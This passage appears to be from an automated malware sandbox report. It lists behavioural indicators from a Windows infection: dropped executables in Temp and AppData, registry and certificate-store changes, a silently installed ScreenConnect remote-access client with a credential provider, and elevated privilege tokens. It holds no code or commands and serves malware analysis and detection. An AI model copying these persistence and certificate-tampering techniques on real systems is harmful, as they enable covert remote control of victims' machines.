| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\access.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\chcp.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\22.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\test.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\findstr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\mod.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\system.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\jij.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\findstr.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.WindowsClient.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.WindowsClient.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.WindowsClient.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.WindowsClient.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" | C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.WindowsClient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.ClientService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\system32\DrvInst.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" | C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.ClientService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2E | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" | C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.WindowsClient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.WindowsClient.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" | C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.ClientService.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86943F5896C1004C9089522E56EA9E4E\SourceList | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86943F5896C1004C9089522E56EA9E4E\SourceList\Net | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\sc-0cef7d10d8f459fc\shell | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\sc-0cef7d10d8f459fc\shell\open | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-90BB-AB72F266AE41}\InprocServer32\ = "C:\\Program Files (x86)\\ScreenConnect Client (0cef7d10d8f459fc)\\ScreenConnect.WindowsCredentialProvider.dll" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86943F5896C1004C9089522E56EA9E4E\Version = "402849799" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86943F5896C1004C9089522E56EA9E4E\ProductIcon = "C:\\Windows\\Installer\\{85F34968-1C69-C400-0998-25E265AEE9E4}\\DefaultIcon" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\86F177BE477A0EA4C0FED7018D4F95CF | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\sc-0cef7d10d8f459fc | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\sc-0cef7d10d8f459fc\shell\open\command | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\sc-0cef7d10d8f459fc\shell\open\command | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\sc-0cef7d10d8f459fc\shell\open\command\ = "\"C:\\Program Files (x86)\\ScreenConnect Client (0cef7d10d8f459fc)\\ScreenConnect.WindowsClient.exe\" \"%1\"" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-90BB-AB72F266AE41}\InprocServer32\ThreadingModel = "Apartment" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86943F5896C1004C9089522E56EA9E4E\ProductName = "ScreenConnect Client (0cef7d10d8f459fc)" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86943F5896C1004C9089522E56EA9E4E\PackageCode = "86943F5896C1004C9089522E56EA9E4E" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\sc-0cef7d10d8f459fc | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-90BB-AB72F266AE41} | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-90BB-AB72F266AE41}\InprocServer32 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86943F5896C1004C9089522E56EA9E4E\Assignment = "1" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86943F5896C1004C9089522E56EA9E4E\AuthorizedLUAApp = "0" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86943F5896C1004C9089522E56EA9E4E\SourceList\PackageName = "ScreenConnect.ClientSetup.msi" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86943F5896C1004C9089522E56EA9E4E\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\24.3.7.9067\\0cef7d10d8f459fc\\" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86943F5896C1004C9089522E56EA9E4E\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\24.3.7.9067\\0cef7d10d8f459fc\\" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-90BB-AB72F266AE41}\ = "ScreenConnect Client (0cef7d10d8f459fc) Credential Provider" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86943F5896C1004C9089522E56EA9E4E | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86943F5896C1004C9089522E56EA9E4E\AdvertiseFlags = "388" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86943F5896C1004C9089522E56EA9E4E\InstanceType = "0" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86943F5896C1004C9089522E56EA9E4E\DeploymentFlags = "3" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86943F5896C1004C9089522E56EA9E4E\Clients = 3a0000000000 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\sc-0cef7d10d8f459fc\URL Protocol | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\sc-0cef7d10d8f459fc\UseOriginalUrlEncoding = "1" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\86943F5896C1004C9089522E56EA9E4E\Full | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86943F5896C1004C9089522E56EA9E4E\Language = "1033" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\86943F5896C1004C9089522E56EA9E4E | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\86F177BE477A0EA4C0FED7018D4F95CF\86943F5896C1004C9089522E56EA9E4E | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86943F5896C1004C9089522E56EA9E4E\SourceList\Media | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86943F5896C1004C9089522E56EA9E4E\SourceList\Media\1 = ";" | C:\Windows\system32\msiexec.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = [certificate blob data omitted from report] | C:\Users\Admin\AppData\Local\Temp\a\noyjhoadw.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = [certificate blob data omitted from report] | C:\Users\Admin\AppData\Local\Temp\a\noyjhoadw.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 | C:\Users\Admin\AppData\Local\Temp\634977\Surrey.com | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = [certificate blob data omitted from report] | C:\Users\Admin\AppData\Local\Temp\634977\Surrey.com | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = [certificate blob data omitted from report] | C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 | C:\Users\Admin\AppData\Local\Temp\a\noyjhoadw.exe | N/A |
Runs ping.exe
Scheduled Task/Job: Scheduled Task
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\server.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\MSystem32.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\ProgramData\Bitdefender\$77-Bitdefender.exe | N/A |
| N/A | N/A | \??\c:\program files (x86)\internet explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\rea.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\a\Update.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\a\zoom_invitecode=23884232.zoom.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeCreateTokenPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeMachineAccountPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeCreatePermanentPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeChangeNotifyPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSyncAgentPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeEnableDelegationPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
